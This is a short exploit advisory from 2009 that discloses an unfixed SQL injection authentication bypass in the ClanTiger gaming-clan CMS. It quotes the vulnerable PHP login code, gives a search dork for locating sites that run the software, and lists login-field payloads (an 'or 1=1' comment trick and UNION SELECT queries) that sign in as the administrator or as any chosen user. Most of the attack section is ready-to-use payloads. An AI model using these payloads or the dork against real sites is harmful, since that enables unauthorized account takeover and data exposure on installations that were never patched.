CMS INFORMATION:
–>WEB: http://www.clantiger.com
–>DOWNLOAD: http://www.clantiger.com/download-clan-cms
–>DEMO: http://www.demo.clantiger.com/
–>CATEGORY: CMS / Portals
–>DESCRIPTION: ClanTiger is a content management system specifically designed for gaiming
clans…
CMS VULNERABILITY:
–>TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default)
–>DORK: "Powered by ClanTiger"
–>CATEGORY: SQL INJECTION/ AUTH BYPASS
–>AFFECT VERSION: LAST = 1.1.1 (1.1 too)
–>Discovered Bug date: 2009-04-11
–>Reported Bug date: 2009-04-11
–>Fixed bug date: Not fixed
–>Info patch (???): Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cuсada, padres (y amigos xD) por su apoyo.
Path –> [HOME_PATH]/module/login.php
It contents:
function authenticate()
{
$authentication = $this->access->authenticate($_POST['email'],$_POST['password'],(bool)
$_POST['stayLogged']);
if($authentication === true)
{
header('Location: index.php?info=hasLoggedIn');
exit;
}
// we couldn't log in
$this->errorMessages[] = $authentication;
$this->main();
}
Path –> [HOME_PATH]/function/class.accesscontrol.php
It contents:
public function authenticate($email,$password,$stayAuthed=false)
{
if($stayAuthed) $logintime = time() + (3600*24*356*3);
else $logintime = time() + 3600;
// attempt to get the user from the database
include ROOTPATH . 'base/class.user.php';
$user = new User;
$user->email = $email;
$user->password = md5($password);
$user->getBy(array('email','password'));
...
}
**gpc_magic_quotes=off
[HOME_PATH]/index.php?module=login
login form:
e-mail value: something' [SQL]
password value: something //it is not used
login post form:
e-mail value: something' or 1=1 /* –> we are admin!
e-mail value: something' or 1 # –> we are admin!
Note: Now, we need DB_PREFIX (default: "", others: db_, clan_, etc)
e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=1 /–>admin (if id=1)!
e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=12 / –>we are user id=12!
GREETZ TO: Str0ke, JosS and all spanish Hack3Rs community!